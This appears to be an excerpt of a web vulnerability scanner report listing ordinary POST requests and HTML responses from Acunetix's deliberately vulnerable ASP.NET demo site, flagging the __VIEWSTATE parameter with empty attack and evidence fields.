Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8312&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAdmGbpdoIZGRk5pDE21Pem%2B4YbCCjbqpPCpZbZxc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B%2Bo6hBQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gISnsD1osdlm0Q50nH8GGD3eF6nIA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:03 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAdmGbpdoIZGRk5pDE21Pem+4YbCCjbqpPCpZbZxc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL++o6hBQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gISnsD1osdlm0Q50nH8GGD3eF6nIA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:White" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8316&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAHQvAqNoIZGRkzy00eSGWkTUTBk8fT55XMmH4XtA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKPnO3PCALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL5h6JQVNyf%2F%2FTmeqyMCXNeXffsOQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:40 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAHQvAqNoIZGRkzy00eSGWkTUTBk8fT55XMmH4XtA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKPnO3PCALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL5h6JQVNyf//TmeqyMCXNeXffsOQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:White" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
